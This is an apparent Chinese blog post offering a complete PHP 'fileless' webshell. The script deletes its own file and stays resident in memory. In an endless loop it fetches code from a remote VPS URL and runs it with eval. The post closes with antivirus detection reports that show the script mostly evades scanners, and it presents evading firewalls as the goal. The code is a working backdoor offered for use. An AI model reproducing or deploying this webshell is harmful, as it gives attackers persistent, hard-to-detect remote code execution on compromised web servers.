【分析】利用php的无文件木马,上传一个运行后会删除自己的脚本。它会驻留在内存中运行,脚本内容是一个死循环:隔一段时间运行一下远程VPS上的代码。这种没有文件落地的webshell想必waf也没办法拦截
【代码】
<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);//Windows 最好不要设置为 0, 9999更合适
$remote_file ='https://ws.hellotools.eu.org/tracker.js';
while($code = file_get_contents($remote_file)){
@eval($code);
sleep(5);//休眠时间
};
?>
查杀报告:
- VT(1/70): https://www.virustotal.com/gui/file/111ea734bfa2ee9bbbfa075ba332d658d86221cbcd193619c3decf2b49ec8b46
- 微步(安全): https://s.threatbook.com/report/file/111ea734bfa2ee9bbbfa075ba332d658d86221cbcd193619c3decf2b49ec8b46
- WEBDIR(报毒,
HEUR.WebShell.SelfDelete.1): https://scanner.baidu.com/#/pages/scan_result?hash=b51aa0bec2756ab3a94e1d1ff21a48f8 - SHELLPUB.COM(报毒): https://n.shellpub.com/detail/b984e75c-2a7e-4b0a-b97f-33b08ffef7ac
作者:HackPig520
出处:https://www.cnblogs.com/xiaozhu2020/p/php-nofile_webshell.html
本文版权归作者所有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接,否则保留追究法律责任的权利。
